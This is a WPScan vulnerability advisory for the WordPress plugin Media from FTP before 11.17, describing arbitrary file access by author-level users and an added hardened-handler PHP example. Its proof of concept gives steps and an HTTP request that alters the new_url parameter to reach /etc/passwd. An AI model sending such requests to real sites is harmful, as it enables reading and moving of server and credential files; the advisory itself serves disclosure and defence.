wpvulndb | Dmitrii Ignatyev | WPVDB-ID: 0D323B07-C6E7-4ABA-85BC-64659AD0C85D
History: Aug 14, 2023 - 12:00 a.m.

Media from FTP < 11.17 - Author+ Arbitrary File Access

2023-08-14 00:00:00
Dmitrii Ignatyev
wpscan.com
5
ftp access
arbitrary file access
rce
multisite setup

AI Score: 8.6
Confidence: High
EPSS: 0.001
Percentile: 37.1%

Description: The plugin does not properly limit who can use it, which may allow users with author+ privileges to move files around, such as wp-config.php, which may lead to RCE in some cases. In 11.16 the manage_options capability was used; however, this is still insufficient in MultiSite setups.
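As an added illustration (not the plugin's code, and not its actual fix), the shape of a hardened handler for this kind of file-move AJAX action: a nonce check, a capability check that also requires a network admin on multisite (since every site administrator holds manage_options while the filesystem is shared network-wide), and confinement of the destination to the uploads directory. The hook name and the `example_` functions are assumptions made for the illustration.

```php
<?php
// Added example (not the plugin's code): hardened AJAX handler for a
// file-move action. Hook and action names are assumptions for illustration.

add_action( 'wp_ajax_example_move_media', 'example_move_media_handler' );

function example_move_media_handler() {
    // Nonce: ties the request to a form the user actually loaded.
    check_ajax_referer( 'example_move_media', 'nonce' );

    // Capability: manage_options alone is not enough on multisite, since
    // every site administrator holds it while the filesystem is shared
    // network-wide. Require a network (super) admin there.
    if ( ! current_user_can( 'manage_options' )
        || ( is_multisite() && ! is_super_admin() ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Path confinement: refuse any destination that resolves outside the
    // uploads directory (covers ../ sequences and absolute paths).
    $base    = realpath( wp_upload_dir()['basedir'] );
    $new_url = isset( $_POST['new_url'] ) ? wp_unslash( $_POST['new_url'] ) : '';
    $target  = example_confine_path( $base, $new_url );
    if ( null === $target ) {
        wp_send_json_error( 'destination outside uploads directory', 400 );
    }

    // ... perform the move against $target only ...
    wp_send_json_success( array( 'target' => $target ) );
}

// Canonical absolute path for $relative under $base, or null if it escapes.
function example_confine_path( $base, $relative ) {
    $candidate = $base . DIRECTORY_SEPARATOR . ltrim( $relative, '/\\' );
    $leaf      = basename( $candidate );
    if ( '' === $leaf || '.' === $leaf || '..' === $leaf ) {
        return null;
    }
    // realpath() needs an existing path, so canonicalise the parent
    // directory and re-append the final component.
    $parent = realpath( dirname( $candidate ) );
    if ( false === $parent ) {
        return null;
    }
    $resolved = $parent . DIRECTORY_SEPARATOR . $leaf;
    if ( 0 !== strpos( $resolved, $base . DIRECTORY_SEPARATOR ) ) {
        return null;
    }
    return $resolved;
}
```

With this shape, a request whose new_url points at /etc/passwd or climbs out of the uploads tree is rejected with a 400 before any filesystem operation, and a site administrator on a multisite network is rejected with a 403.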

PoC

  1. Go to /wp-admin/admin.php?page=mediafromftp-search-register
  2. Select any file from the media text list below
  3. Click "Update Media"
  4. Intercept the request with action=mediafromftp-update-ajax-action
  5. Change "new_url" by adding the following to the file path: /…/…/…/…/…/…/…/…/…/…/etc/passwd

  POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

  action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

